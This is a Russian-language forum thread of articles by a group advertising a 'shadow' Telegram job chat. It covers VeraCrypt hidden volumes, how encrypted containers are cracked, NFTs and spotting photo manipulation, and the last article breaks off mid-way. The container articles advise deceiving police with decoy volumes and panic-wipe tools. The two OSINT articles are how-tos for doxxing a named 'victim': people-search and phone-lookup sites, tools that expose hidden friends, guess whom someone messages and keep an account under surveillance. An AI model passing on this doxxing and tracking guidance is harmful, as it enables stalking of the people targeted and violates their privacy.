https://i.imgur.com/O5ovlEr.gif

Приветствуем всех читателей и участников форума!

В этой теме мы будем публиковать наши авторские статьи.

Наша команда писателей тщательно выбирает интересные темы и пишет оригинальный контент специально для вас!

Каждую неделю мы будем делиться с вами новым контентом, связанный с дарком!

Еще больше контента можно найти на нашем канале в Телеграме!

https://t.me/+_nx0mbcIGWlhMTFi

Авторские статьи по заработку, мануалы и скрипты по безопасности

Абсолютно каждый день свежие новости про крипту, теневые темы, криминал и NFT

Так же у нас есть чат, где можно найти работу в теневой сфере или подыскать покупателей на свои услуги!

https://i.gyazo.com/ace030fed4d3b4e906794c5fc56fafa5.jpg

Криптоконтейнер. Создаем "сейф" в ПК

вступить в чат




Криптоконтейнер простым языком - это защищенный сейф в вашем компьютере. Многие люди пренебрегают защитой своих данных. А зря. Всю важную информацию необходимо хранить в криптоконтейнерах, дабы она не попала в руки третьих лиц. Вооружившись новыми знаниями в данной статье, вы сможете создавать зашифрованные контейнеры, обладающие высокой стойкостью к атакам. Создавать мы будем как обычный том, так и скрытый (с двойным дном).

Плюсы криптоконтейнера


Безопасность. Ваши файлы будут надежно защищены. Тем не менее любая система не без изъянов, и существуют методы взлома, практикующиеся спецслужбами. О них мы поговорим в следующей статье и предложим способы, которые помогут их избежать.

Экстренное уничтожение. Если вы решите удалить файлы, хранящиеся на жестком диске, то удаление обычным способом займет очень много времени, в то время как программа CryptoCrash поможет ликвидировать информацию с криптоконтейнера за считанные секунды.
Программа для шифрования

TrueCrypt или VeraCrypt?

В 2014 году разработчики TrueCrypt заявили, что больше не будут поддерживать проект и предложили своим пользователям альтернативу в видe VeraCrypt. Они также отметили, что VeraCrypt значительно выигрывает у TrueCrypt.

Какие плюсы у VeraCrypt?

VeraCrypt более устойчива от брутфоса (атак прямого перебора ключей);

Имеет поддержку разработчиков и регулярно обновляется.


Переходим к практической части.

Как создать криптоконтейнер

Первым шагом нужно будет скачать программу VeraCrypt, предназначенную для быстрого шифрования.

Переходим на сайт veracrypt.fr -> "Downloads"

https://i.gyazo.com/04c605eb92937fdfd165dd7318207701.jpg

Выбираем свою операционную систему и скачиваем.

https://i.gyazo.com/6c8fe1bbcebc2e6c7e1df30688842fbf.jpg

После того как программа успешно установлена на ПК, начинаем создание криптоконтейнера. Для этого жмем "Создать том".

https://i.gyazo.com/84af7407a376d972c5eb12f01c1c6e2d.jpg

Обычный том

Вначале мы рассмотрим, как создавать обычный криптоконтейнер, после чего перейдем к скрытому.

Выбираем “Создать зашифрованный файловый контейнер”.

https://i.gyazo.com/6b1692df307f8544fa47d60be098e3d3.jpg

Сейчас нам нужен "Обычный том", он в дальнейшем послужит местом хранения скрытого.

https://i.gyazo.com/5be95452147f88cccc7cf6a5b3a4e77e.jpg

Выбираем место хранения и имя файла (абсолютно любое). Сам файл может иметь какое угодно расширение, например, .mp4, .txt, .wav.

https://i.gyazo.com/3e77dde3038e27f229ba98dc7c6008ea.jpg

Затем нам нужно настроить шифрование. VeraCrypt использует такие алгоритмы шифрования как: AES, Serpent, Twofish, Camellia, Кузнечик и их связки.

Для того чтобы зашифровать (и расшифровать) данные, криптоконтейнер не использует пароль. Для шифрования любым алгоритмом (от AES до «Кузнечика») используется двоичный ключ фиксированной длины, так называемый Data Encryption Key или Media Encryption Key (MEK).

Ключ шифрования (MEK) хранится в оперативной памяти совершенно независимо от того, какой алгоритм шифрования вы выбрали в настройках контейнера: AES, Twofish, Serpent, «Кузнечик» или любая комбинация алгоритмов, сложность и скорость их извлечения практически одинакова.

https://i.gyazo.com/c4215779910d9dbbd59a424d0628ee2b.jpg

Далее требуется обозначить размер нашего тома.

https://i.gyazo.com/7b9fe0b4722099abf4ea522947da3e35.jpg

Пароль от обычного тома не обязательно должен быть очень сложным, так как всю важную информацию мы все равно будем хранить в скрытом криптоконтейнере.

https://i.gyazo.com/10ff55192a0a07324bc5a8b123f3b7b0.jpg

После выполнения всех предыдущих шагов запустится форматирование тома, и криптоконтейнер будет создан.

https://i.gyazo.com/afdb70cd16b969fed1b66c25ee90a4be.jpg

Скрытый том

Чтобы создать скрытый криптоконтейнер, выберите “Создать зашифрованный файловый контейнер”, как и в предыдущий раз, только далее вместо обычного тома, нужно выбрать "Скрытый том VeraCrypt".

https://i.gyazo.com/ea8a06e5c1e5a6532560d0bda6f607fd.jpg

Существует два режима создания тома, их подробное описание указано на скриншоте. Как вы можете увидеть, опция "Обычный режим" предназначена для тех, кто еще не создал обычный том, но так как он у нас уже имеется, то кликаем на "Прямой режим".

https://i.gyazo.com/00ba4d7c40b530607252359f0f685d5e.jpg

Далее указываем расположение ранее созданного обычного контейнера и вводим пароль от него, который вы установили.

Выбираем любой алгоритм шифрования, допустим AES.

Указываем размер скрытого тома и вводим уникальный пароль (подробнее о создании надежного пароля вы узнаете в следующей статье).

Готово! Вы успешно создали криптоконтейнер с двойным дном.

https://i.gyazo.com/f5ac5549b2c9b46b14392a97a48022f6.jpg

Чтобы его открыть нужно выбрать ваш файл и ввести пароль от обычного или скрытого контейнера, в зависимости от того какой вам требуется.

Вывод

Несмотря на то что криптоконтейнер крайне надежная штука, это не исключает возможности его взлома, как бы печально это не звучало. Не существует 100 % гарантии безопасности, это утопия. Но криптоконтейнер способен значительно усложнить возможную атаку на него или вовсе свести к минимуму. О существующих способах взлома и вариантах их избежать мы поговорим в следующей статье.

https://telegra.ph/Kriptokontejner-S...ejf-v-PK-02-08

https://i.gyazo.com/5e28d9e2f988df3ad107663197d51b21.jpg

Как взламывают криптоконтейнеры

Вступить в наш чат


"Криптоконтейнер нельзя взломать", - многие говорят. Но вынуждены вас разочаровать, это не так. Существует достаточно много способов, которые способны нанести ущерб вашим файлам, хранящимся в криптоконтейнере, и поставить под сомнение вашу безопасность. Будучи ознакомленным с данной информацией, вы измените свой взгляд на криптоконтейнеры и вопросы безопасности в целом. В конце этой статьи мы предложим несколько ценных рекомендаций, которые помогут сделать ваши криптоконтейнеры более устойчивыми к всевозможным атакам.



https://i.gyazo.com/60e31eb3b1133dbe7d4cd505a63deac3.jpg

Способы взлома

Взлом через уязвимость программного обеспечения

Программы, которые шифруют ваши данные, могут делать это не очень надежным способом. Да, процент подобного взлома невелик, но все же он есть. Поэтому мы обязательно рекомендуем использовать только проверенные софты, такие как VeraCrypt или TrueCrypt.

BruteForce или атака полным перебором

Данный метод подбора пароля, используемого для шифрования, часто применяется хакерами. Скорость успешного выявления нужного ключа крайне низка и займет десятки лет, но только в том случае, если BruteForce делается на стандартном компьютере со стандартной мощность. Вы не можете исключить тот факт, что подбор пароля может быть произведен на супермощном компьютере со скоростью в тысячи раз выше обычной. Тем не менее, такая процедура не только энергозатратная, но и очень дорогостоящая. Если вы не опасный киберпреступник или террорист, то такая опасность вам не грозит.

Для обычных людей чаще всего применяется более упрощенный BruteForce по словарю. Это значит, что существует многомиллионная база паролей, каждый пароль из которой проверяется. Такой подбор не требует никаких затрат и отличается своей простотой. И единственный способ его избежать - придумать такой пароль, чтобы его не оказалось в базе.

Помимо BruteForce по словарю, есть еще один вид атаки с помощью подбора. Он выглядит следующим образом: собирается вся информация о вас, включающая возраст, адрес, девичью фамилию матери, кличку питомца. После чего генерируется возможные варианты ключа. К примеру, вашего питомца зовут Бобик, значит программа будет использовать такие варианты: Bobik123, B1o2b3i4k5 и так до бесконечности.

Терморектальный (бандитский) криптоанализ

Само название говорит о сути данного метода. В его основе лежат угрозы, пытки и шантаж. Таким образом, никакие сложные пароли вам не помогут, но и здесь есть выход.


Вам необходимо установить программу быстрого уничтожения файлов, такую как Panic Button, она за считанные секунды удалит всю информацию о криптоконтейнере.

Используйте криптоконтейнер с двойным дном. Как его создать подробно описано в этой статье. В таком случае вы можете выдать пароль от обычного тома, а про существование скрытого никто не узнает.

Файл-ключ на microSD карте. При создании криптоконтейнера вам необходимо добавить файл-ключ, расположенный на microSD. Такую карту очень легко уничтожить, сломав ее, тогда вся ваша зашифрованная информация не будет подлежать восстановлению.
Вредоносный вирус

Если так случится, что ваш компьютер окажется заражен трояном или кейлоггером, то ваша приватность окажется под угрозой. Чтобы этого не случилось нужно использовать комплексную защиту вашего ПК. Файл-ключ эффективен не только в борьбе с терморектальным криптоанализом, он так же поможет избежать расшифрования в случае кейлоггера. Не помешает и временное отключение компьютера от сети в момент пользования криптоконтейнером.

Криминалистический анализ дампа памяти

Правоохранительные органы довольно часто используют данный метод. В ходе обыска компьютер изымается, происходит снятие оперативной памяти, а после чего находится информация о паролях. Чтобы сделать дамп, ваш ПК должен быть включен, а криптоконтейнер смонтирован. Дабы избежать такой участи, обязательно установите время автоматического демонтирования. Если вы работаете с очень секретными данными, то поставьте время на 2 минуты, если вы обычный пользователь, то 60 минут будет достаточно. Программа Panic Button тоже не помешает в этом случае, так как она очищает данные из ОС в момент отсутствия.

Взлом при помощи запасного ключа

Если вы пользуетесь программой VeraCrypt, TrueCrypt и другими подобными, то такая уязвимость вам не грозит.

Но такой расклад все же возможен, если вы делали комплексное шифрование системы. Если вы пользователь Microsoft, то ключи сохраняются в Microsoft Account, если macOS, то в iCloud. Будьте внимательны, когда шифруете систему, сразу же отключайте автоматическое сохранение ключа в облаке, иначе все ваши данные могут быть расшифрованы, в случае доступа третьих лиц к вашей учетной записи.

Рекомендации для защиты криптоконтейнера


Создайте надежный пароль. В идеале он должен иметь от 30 до 50 символов и храниться только у вас в голове. Записывать его никуда нельзя, тем более раннее использовать где-либо еще. Для того, чтобы его не удалось подобрать методом BruteForce важно не использовать информацию, имеющую какое-то к вам отношение (имена, псевдонимы, клички), слова и фразы, даты тоже под запретом. Пароль должен содержать символы, цифры и буквы верхнего и нижнего регистра.

Регулярно меняйте пароль. Важно хотя бы один раз в год проводить смену всех паролей. Это нужно для того, чтобы избежать утечек данных, которые бывают у разных компаний.

Имейте более 1 криптоконтейнера. Неразумно хранить все данные в одном месте. Решите сколько криптоконтейнеров вам необходимо и загрузите туда все нужные файлы.

Используйте криптоконтейнер с двойным дном. Нужно иметь открытый и скрытый том. В случае, если правоохранительные органы потребует пароль от криптоконтейнера, то смело можно выдать от открытого, в то время как вся тайная информация останется скрытой от их глаз.

Маскируйте криптоконтейнеры. Надежно защитить криптоконтейнер не достаточно, более важно сделать так, чтобы его существование не было обнаружено. Для этого программа VeraCrypt не указывает на то, что перед нами находить криптоконтейнер. Вы можете выбрать любое расширение и поместить файл в папку с другими аналогичными расширениями.

Криптоконтейнер для приманки. Создайте криптоконтейнер и демонстративно поместите его в видное место, он нужен для отвлечения внимания от основного. Название тоже должно провоцировать интерес, например, "Главное". Загрузите туда маловажные файлы, которые в случае чего вы смело сможете продемонстрировать. Не забывайте регулярно создавать видимость работы с этим контейнером, периодически обновляя данные.
Вывод

Никто не может гарантировать вам полную безопасность, но, используя все вышеизложенные советы, вы способны сами себе ее обеспечить. Советуем вам пересмотреть свои взгляды на защиту информации и взять на вооружение, предложенные рекомендации. Надеюсь, что данная статья была полезной для вас. "Предупрежден - значит вооружен!".

https://telegra.ph/Kriptokontejner-S...ejf-v-PK-02-08

https://i.gyazo.com/4f3022b0c001e7de08e2e7dc74458a8c.jpg

NFT - феномен в мире криптовалют

Вступить в наш чат

NFT - относительно новое явление, разговоры о котором доносятся отовсюду - новости, газеты, телевидение.

Что это такое и почему все про это говорят?


NFT - это аббревиатура от английского non-fungible tokens, что означает "невзаимозаменяемый токен". Взаимозаменяемость - ключевой момент всех фиатных валют, BTC, ETH всегда можно обменять на другую криптовалюту, что нельзя сказать про NFT. Невзаимозаменяемый значит уникальный, он может представлять из себя товар, картину, песню. Например, если взять искусство, то картины Ван Гога не ровняются картинам И. Е. Репина, так и токен NFT является неповторимым и единственным в своем роде. Его цель - интегрировать уникальные предметы в блокчейн. Эти активы одновременно являются объектами коллекционирования и приносят доход.

В технической основе невзаимозаменяемого токена чаще всего заложен Ethereum, точнее, стандарт ERC-721, в соответствии с которым создаются смарт‑контракты, позволяющие выпускать NFT.

https://i.gyazo.com/86122b15d94b1b58a407381da9a8739e.jpg

Как создать NFT-токен?

NFT-токены создаются в цифровом виде с помощью таких платформ, как Binance, OpenSea, Makerspace и т.д. С помощью этих платформ вы можете загружать, присваивать имя, добавлять описание к своим творениям и преобразовывать их в NFT.

Сейчас мы рассмотрим с вами процедуру создания на платформе Binance, которая займет не более 5 минут. Чтобы иметь доступ к созданию и другим расширенным возможностям Binance, вам нужно в обязательном порядке пройти верификацию и подтвердить личность. Также в данный момент создавать NFT на платформе могут только предварительно утвержденные авторы. Для того, чтобы вас утвердили, вы можете написать на почту nft@binance.com и прислать свои идеи, только таким образом работы смогут быть рассмотрены. Но в ближайшем времени данная услуга станет доступна для всех пользователей.

Для начала нам нужно перейти на главную страницу NFT площадки.

https://i.gyazo.com/99bd09800d53f9b6ed74db9ead353993.jpg

Далее нажимаем "Создать" и видим следующую страницу с доступными видами NFT: это может быть картинка, аудио, видео.

https://i.gyazo.com/0a4943658e4dc53d66f03265d6cea8e2.jpg

Вы можете создать как один NFT (BEP-721) или серию (BEP-1155). С помощью серии вы сможете продать несколько образцов своего творения, каждый с уникальным идентификатором.

Имейте ввиду, что за создание NFT-токена у вас возьмут комиссию. Под комиссией за транзакцию подразумевать все дополнительные расходы при продаже, отчисляемые платформе или автору. Если на других платформах процент комиссий может варьироваться от 2.5 до 15, то на Binance он значительно ниже и составляет 0,005 BNB. На Binance в качестве комиссии используется BNB (Binance Coin). Поэтому удостоверьтесь, что на вашем балансе есть данная криптовалюта.

После того, как ваш файл загрузится, Binance создаст NFT. Посмотреть как купленные, так созданные NFT можно в разделе "Коллекции" -> "Мои NFT".

Также, если у вас уже есть NFT на другой бирже, вы можете их импортировать на Binance.

Способы заработать с помощью NFT


NFT Airdrops (раздача). Вы можете стать обладателем NFT совершенно бесплатно, для этого существуют раздачи, которые в этом помогут: NFT holder airdrop, NFT platform airdrop.

NFT holder airdrop.Данный вид раздачи подразумевает, что вы уже являетесь владельцем NFT, в то время как автор выпускает различные штуки для дополнения. К примеру, в недавнем времени Bored Apes сделал подарок своим держателям. Так, владельцы обезьянок получили бесплатные сыворотки, которые меняли их персонажей в непохожих друг на друга мутантов. В скором времени обладателю такой сыворотки было предложено 269 ETH за ее продажу.

NFT platform airdrop.С повышением спроса на NFT появляются новые торговые площадки. Своим первым пользователям они дарят подарки в виде NFT. Поэтому, чтобы стать счастливым обладателем бесплатного токена, отслеживай новые маркетплейсы.

Трейдинг NFT. Суть просто - покупаешь дешевле, продаешь дороже. Про трейдинг криптовалютами мы рассказывали здесь.

Стейкинг(возможность заработать проценты на изменении курса криптовалюты). Данный способ не включает ваше активное участие. Для пассивного заработка требуется заложить свои NFT, тем самым обеспечивая работоспособность блокчейна.
Капитализация

Мировой рынок NFT в 2021 году достиг $22 млрд. С начала 2020 года общая капитализация NFT выросла в 56 раз.

Токен MANA, служащий для покупок различных виртуальных товаров на маркетплейсах, вырос на 40 процентов за последний месяц и занимает лидирующее положение среди прочих.

https://i.gyazo.com/e11fb871c19066433ec5c877de75b635.jpg

Минусы NFT


Отсутствие связи между подлинником и NFT. Покупателям кажется, что покупая NFT, они покупают оригинал. К сожалению, это лишь ловко созданная иллюзия. Приобретая NFT, вы получаете не произведение, а только токен, и ничем, кроме токена, вы не владеете.

Технические проблемы. Дело в том, что NFT-токен и само произведение хранятся по отдельности. Возьмем к примеру платформу Nifty Gateway. При публикации NFT, к любому токену, будь то картинка, аудио или видео, прилагается формат JSON (текстовый формат обмена данными). Ключевой момент в нем - это ссылка, указывающая на сервер Nifty, который при запросе перенаправит браузер на картинку, сохраненную в распределенной файловой системе IPFS. Выходит, что NFT, который вы покупаете, - это хеш‑сумма от файла JSON, а не от самого произведения. Токен при этом хранится в блокчейне Ethereum. Случись что с Nifty, связь тот час же прервется. IPFS также не гарантируют никакой надежности: данные тут хранятся до тех пор, пока их активно запрашивают.

Нет гарантий.Вы можете вложиться в NFT, ждать момента, пока он вырастет в цене, но этого так и не произойдет. Одним из таких ярких примеров является проект CryptoKitties, как только NFT с котятами поступили в продажу, люди массово стали их скупать по $300, посчитав, что они взлетят в цене. Но котята не только ни взлетели, а упали аж до $2, как только ажиотаж прошел. Разработчики же перевели всю ситуацию в шутку, назвав котят всего лишь развлечением ради игры, а не для прибыльных вложений. Так что, если вы приобрели кота и прогорели, то это ваша проблема.
https://i.gyazo.com/180c9618e38e03d746eb3f88f2f57e8e.jpg

Нет авторских прав. Может показаться странным тот факт, что вы платите большую сумму денег за картинку, но по-прежнему не обладаете ей? NFT не равно авторским правам. Владеет всеми правами только один человек - это создатель. Но как так получается? Всему виной шардинг.

Шардинг

Простыми словами шардинг - это дробление, которое разбивает токен NFT на части поменьше. Сама идея разделения криптовалюты не нова и появилась она из-за ряда возникших проблем. Изначально, покупая NFT с изображением какой-либо картины, вы автоматически приравнивались к владельцу, в том числе обладающим всеми авторскими правами. Поэтому была предложена система шардов, которая позволяет сохранить основные авторские права его создателя, тем не менее покупатель остается вправе демонстрировать NFT, распечатывать копию.

владелец выбирает сколько шардов всего будет, какие из них он выставит на продажу, а какие оставит себе;

устанавливает цену для каждой части.
Как получить все шарды?

Выкупить все части. Однако есть ряд сложностей, которые не позволят вам этого сделать. Например, некоторые части уже могут быть куплены или просто-напросто не выставлены на продажу.

Допустим, вы уже владеете некой частью шардов NFT, но вам не хватает какого-то количества. Вы можете выкупить недостающие части у других держателей, для этого назначьте цену выкупа и депонируйте шарды в смарт-контракт.
Но даже, если вы выкупите все части, вы все равно не сможете побороться за право владения авторскими правами. Суд все равно будет на стороне автора-создателя, а не на вашей.

Обычно в ходе разделения токен ERC-721 NFT разбивается на взаимозаменяемые части, то есть на токены ERC-20.

Платформы для дробления


Nftfy - считается первой платформой по дроблению NFT

Fractional.art - дает возможность делить целые коллекции
Потенциал NFT

В настоящее время рынок NFT развивается с бешенной скоростью, охватывая все большие массы. Что касается инвестиций, то риск безусловно есть, так как NFT находится в прямой взаимосвязи со спросом, существующим в определенный момент. Тем не менее цифры и тот факт, что многие известные личности инвестируют в NFT или продают свое творчество, свидетельствует о том, что интерес к NFT растет.

Во второй части вы узнаете о ТОП-10 самых ошеломляюще дорогих NFT за всю историю.

https://telegra.ph/Kriptokontejner-S...ejf-v-PK-02-08

https://i.gyazo.com/16e9efa1e7ae00aa04128d04f969d963.jpg

Назови мне свое имя, и я скажу, кто ты: как "пробить" человека?

Вступить в наш чат

Так или иначе, любой человек оставляет своей след в всемирной паутине. Каждый второй сайт собирает, хранит, обрабатывает, а иногда и продает ваши данные третьим лицам.Утечки данных и пренебрежение безопасностью многих людей дают возможность для быстрого сбора информации. Не нужно быть хакером, совершать какие-либо противоправные действия или иметь доступ к закрытым базам правоохранительных органов, чтобы пробить конкретного человека, вся информация лежит на поверхности. Все, что нам нужно - это знать несколько терминов и открытые источники по поиску данных. Обо всем этом и пойдет речь в статье.

Википедиягласит: «90 процентов разведданных приходит из открытых источников и только 10 — за счёт работы агентуры»



OSINT (Open-source intelligence) - разведка в открытых источниках, включает в себя поиск, анализ и сбор разведывательной информации, полученной из общедоступных источников. OSINT не является взломом, шпионажем, вербовкой или иным противозаконным действием.


Этапы:

https://i.gyazo.com/cdd47e9924a20302911e6bc98b6d1647.png


Постановка/формулировка задачи;

Планирование;

Сбор данных;

Обработка информации;

Анализ результатов и отчет.
Постановка задачи:

На начальном этапе важно установить для себя цель, к примеру: "Нужно узнать как можно больше информации об этом человеке". Под информацией мы подразумеваем его биографию, психологический портрет, место жительства, работы и другую важную для нас информацию.

Планирование:

Не имея четкого плана, вы будете долго блуждать на просторах интернета, тщетно пытаясь хоть что-то найти. В лучшем случае вы сможете найти какие-то обрывки данных, в худшем потратите свое время.

Итак, как выстроить план:


Известная информация
Подумайте, что на данный момент у вас уже имеется: имя, почта, фотография, круг друзей, телефон и т.д. Это может быть любая информация, за которую хоть как-то можно зацепиться. Даже, казалось бы, обычный ник, используемый в интернете, уже может ускорить поиск.


Гипотезы
Когда вы собрали всю известную информацию, вам нужно выстроить несколько предположений. Например:

У вас есть фото, значит вы можете приблизительно установить возраст человека. На фотографии он находится рядом с машиной, следовательно формулируем гипотезу, что машина принадлежит ему и предполагаем ее марку. На нем надет деловой костюм, скорее всего он работает в офисе и т.п.

Будьте готовы к тому, что многие ваши гипотезы могут не подтвердиться, в таком случае сразу же откидывайте несоответствующие и заменяйте новыми предположениями.

Имея несколько гипотез, вы можете переходить к следующему этапу - поиску информации.

Сбор данных

Пожалуй, самый важный и сложный этап всей работы. Для того, чтобы собрать данные нужно знать, где их искать. И начнем мы с самого простого и очевидного на первый взгляд метода поиска данных:

Поисковики

Вы можете найти колоссальное количество информации в обычном Google, если будете правильно составлять запрос. А помогут вам в этом поисковые операторы, о которых мы говорили в прошлой статье.

Предлагаю вашему вниманию подборку поисковиков для облегчения поиска:


http://www.searchenginesindex.com/ru/ - подборка поисковиков по всем странам.

https://toolbox.google.com/datasetsearch - бета-версия поисковика Google по базам данных.

https://hackernoon.com/untraceable-s...s-alternatives - англоязычный поисковик, довольно популярный.

https://findo.com/ - умная система поиска по всем личным документам, облачным хранилищам, соцсетям, а так же файлам на устройствах.

https://www.deepgram.com/ - поисковик по аудиофайлам.

http://www.data.gov/ - специализированный поисковик по всем сайтам и открытым базам данных американского правительства.

Omgili - Find out what people are saying - поисковик по форумам, добирается в самые дебри мирового интернета.

http://www.revimg.com/ - поисковик по фотографиям, позволяющий определить, где ранее были размещены изображения.

https://lumendatabase.org/ - база данных для сбора и анализа юридических запросов на удаление контента. С помощью Lumen можно посмотреть, кем был создан запрос и увидеть удаленный материал.
Поиск информации по номеру телефона


Nomer.org - крупная база номеров России и некоторых стран СНГ. Позволяет узнать имя человека или же по имени найти номер телефона и адрес проживания. Для обхождения блокировки нужно использовать VPN.

https://ftpn.ru/search-phone/ выдает по номеру телефона дорки в Google и Яндекс.
Поиск информации по Email

Сервисы, позволяющие проверить существование адреса электронной почты:


https://2ip.ru/mail-checker/

https://www.zerobounce.net/
Более подробная информация:


https://emailrep.io/

https://www.spydialer.com/default.aspx
Поиск по ФИО


Occrp - находит людей, используя миллионы документов, файлов, утечек.

Infobel - ищет человека в любой точке мире, показывая номер телефона, адрес.

Zytely - покажет адрес человека по ФИО, либо наоборот, но для этого нужно знать город.

Yasni - поиск людей по фамилии, имени или никнейму, выдает фото, адрес, номер телефона, профили в социальных сетях.

Clustrmaps (https://clustrmaps.com/p/) — находит адрес проживания, номер телефона, возраст, место работы, специальность и многое другое.


Обработка информации

Когда данные собраны, переходим к следующему этапу - обработка. Определяем какая информация у нас есть, и что она дает. Также оцениваем логичность данных, они не должны противоречить друг другу.

Отчет

Так как мы занимаемся разведкой в личных целях и в рамках закона, нам не нужно составлять сложные графики. Однако, полученные данные все равно лучше зафиксировать, так как сложно удержать все в голове. Самый простой вариант: таблица. Она поможет сгруппировать небольшое количество информации в единое целое. Но если накопилось много данных - таблица не поможет, тогда на помощь приходят mindmaps (схемы связей и детализации между объектами). С помощью mindmaps можно увидеть закономерность или общую связь, которая раньше не приходила на ум.

Вывод:

Таким образом, мы узнали, что такое OSINT, рассмотрели его этапы и выяснили, как собирать данные о конкретном человеке в открытых источниках. Существуют огромные возможности, воспользовавшись которыми вы можете попробовать себя в роли интернет-разведчика. Это лишь часть полезных сайтов для поиска интересующей информации. В следующей статье мы более подробно разберем полезные ресурсы по поиску в социальных сетях и пробиву по фотографиям.

https://i.gyazo.com/7de6932a774f8dfb31ca0a75cc94342d.jpg

Назови мне свое имя, и я скажу, кто ты: деанон по социальным сетям

Вступить в наш чат



Ни для кого не новость, что социальные сети могут сказать о человеке то, что он и сам не понимает до конца. Ваши интересы, хобби, социальный круг, место жительства - все это и многое другое может стать известным всем желающим. Более того, вся нужная информация находится в открытых источниках. Да, любой человек, не имевший ранее дела с интернет-разведкой, после прочтения данной статьи с легкостью сможет найти много интересного о жертве. Но прежде чем мы начнем, советую вам ознакомиться с базовыми знаниями по OSINT.

Социальные сети

Поиск в таких социальных сетях как Facebook, VK, Instagram, Twitter - главные отправные точки. Их возможности беграничны: поиск по городу, имени, возрасту, учебе и другим данным не составляет труда. Но есть и некоторые неочевидные вещи. Существует ряд ресурсов, о возможностях которых вы не догадываетесь. Они не только облегчают поиск, но и помогают обнаружить информацию, которая скрыта на странице пользователя.

С чего начать поиск?

Личные данные

ФИО, фотография, ник, дата рождения, телефон, семейное положение, адрес, образование и т.д. Если вам известно хотя бы одно из этого, то вы уже в состоянии начать поиск.

Представим следующую ситуацию: вам известен только никнейм человека или его email, но вы понятия не имеете в каких социальных сетях начать поиск.

Тогда предлагаю воспользоваться следующими сервисами:

https://knowem.com/ - на данном сайте представлено свыше 500 соц. сетей, вам лишь нужно вести нужный ник, и сервис покажет в каких соц. сетях зарегистрирован пользователь.

https://pipl.com/ - полезный ресурс для поиска человека по почте или никнейму. Аналогично предыдущему ищет профили в самых популярных соц. сетях. Несмотря на то что сайт платный, вам предоставляется пробный период 14 дней.


Социальный поиск

Поисковики Google, Yandex индексируют данные из социальных сетей, но зачастую это лишь имя, фамилия и небольшое описание. Операторы поиска помогут найти намного больше, чем обычный запрос в поисковике.

Так, если знать прежний id пользователя или сообщества, которые больше не существуют, можно из кэша поисковика обнаружить удаленный контент, который был на странице на момент индексации. Это также работает и с недавно удаленными постами.

Для поиска профиля человека введите: "vk id7654321";

Для сообщества: "vk club7654321";

Поиск поста: "vk wall7654321", "vk wall-7654321?offset=20" (и менять значение offset, то есть смещения: 40,60,80). Используйте дефис по той причине, что некоторые id сообществ могут совпадать с id пользователей;

Для альбомов: "vk.com/album-7654321_0".

Круг общения

Круг общения человека оставляет очень сильный отпечаток в сети. Его можно отследить и воспроизвести. Но поиск информации - занятие рутинное и несет мало пользы, если не иметь представления, что и где искать. Довольно часто вы можете столкнуться с такими проблемами как: закрытый профиль, скудное количество данных и т.д. Таким образом, вы доходите до того, что часами прочесываете все социальное окружение человека, пытаясь найти хоть какую-то зацепку.

Если человек предпочел скрыть свой аккаунт Вконтакте, то это не проблема, так как его друзья могут предоставить гораздо больше данных о нем. Попробуйте воспользоваться следующими сайтами:

http://220vk.com/ - всеобъемлющий сервис, включает такие неявные возможности как: скрытые друзья, исходящие лайки, комментарии, цепочки друзей, черный список, города друзей и другой мониторинг страниц. Также способен установить наблюдение за аккаунтом и отслеживать его.

https://vkdia.com/ - узнайте с кем человек ведет переписку, предположительно показывает собеседников с помощью временных интервалов, определяет время проведенное в сети. Не требует авторизации и абсолютно бесплатный.
Facebook же имеет такой сервис как Graph Search, но он все равно мало чего может дать.

Возьмите на вооружение сайт graph.tips, который покажет куда больше информации: посещенные места, комментарии на фотографиях и многое другое.

http://likealyzer.com/ - мониторинг активности страницы.

https://searchisback.com/ - ищет профиль человека по городу, семейному положению, интересам и др.

https://findmyfbid.in/ - определяет ID профиля, который изначально скрыт. Благодаря ID вы можете находить любую информацию.

http://zesty.ca/facebook/ - поиск информации по ID.

whopostedwhat.com - ищет посты в Facebook.

@getfb_bot - бот в телеграме, найдет страницу по номеру телефона.

phantombuster.com - с помощью данного сервиса вы можете сделать парсинг страницы.


Интересы и сообщества

Помимо круга общения, помощниками могут стать интересы. Присмотритесь в каких сообществах состоит человек, он наверняка будет иметь парочку любимых, которые скажут о его хобби. Если сообщества отсутствуют, то начинаем мониторинг лайков. Вконтакте имеет кучу сайтов для слежения за активностью:

http://220vk.com/

Шпион ВК онлайн бот. Поиск ВКонтакте: лайки, диалоги, комментарии, слежка


С другими социальными сетями дела обстоят немного иначе. Для поиска лайков и комментариев, например, в Instagram можно воспользоваться поисковым оператором «site:instagram.com».

Вывод

В этой статье мы максимально постарались собрать всю главную информацию и самые полезные ссылки на рабочие сервисы по OSINT в социальных сетях. Надеемся, что данная информация была вам полезной, и вы узнали хоть что-то новое про распространенные инструменты и методы их использования. В следующей статье вы узнаете, как найти человека только по фотографии, а также как устроен поиск по изображению.

https://telegra.ph/Nazovi-mne-svoe-i...m-setyam-02-27

https://i.gyazo.com/853e1432d5ea1ddb1bd2d7e171ba3c08.jpg


Не верь своим глазам. Как определить и скрыть фотошоп

Вступить в наш чат

Фотография редко предстает перед нами в исходном виде. Зачастую то, что вы видите - это результат долгого и качественного монтажа. Пускают пыль в глаза не только девушки из инстаграма, но так же и многие сервисы. Практически всегда любые услуги сопровождаются картинками, скриншотами. И у вас могут возникнуть сомнения в честности продавца и в предоставляемой им услуге. Нельзя со 100% гарантией сказать, подвергалась ли фотография обработке или нет, но как и везде существует человеческий фактор - неопытность отрисовщика и ваши знания в этом деле. Данная статья поможет вам разобраться в видах монтажа и как его разоблачить.

https://i.gyazo.com/2d2417e241230d451522973cd911d4cc.jpg

Нет единого алгоритма, который определил бы фотошоп. Нельзя загрузить фото в программу и быть уверенным, что она сможет определить монтаж по шумам или, что еще лучше, по отсутствию метаданных. Все методы должны использоваться в совокупности. Существует даже целое подразделение в криминалистике, которое получило название Image Forensics или "криминалистика изображений", в его основе лежит задача определить подлинность фотографии и наличие изменений.

Разберем основные алгоритмы Image Forensics:

Внимательный осмотр

Ваши глаза - основной инструмент. Достаточно загрузить фотографию в любой редактор, увеличить зум на максимум, и все недочеты предстанут перед вами.

Как, например, на этой фотографии. Вы хорошо можете заметить склейки и разрывы полосок, чего никак не должно быть.

https://i.gyazo.com/50288fe527b25d83ea3bc9a9507c065f.jpg

Ко всему прочему, монтаж может быть настолько дилетантским, что, загрузив фото в ExifTool, вы увидите такую картину:

https://i.gyazo.com/7aaa777d3a4b25647ae8c761a27ecd08.jpg


Иногда не нужна никакая программа, чтобы сказать, что фото побывало в фотошопе.

https://i.gyazo.com/4fc27c602307c4816ba7b09c81e1adfb.jpg


Также загружаем фото в поиск по картинкам и находим оригинал:

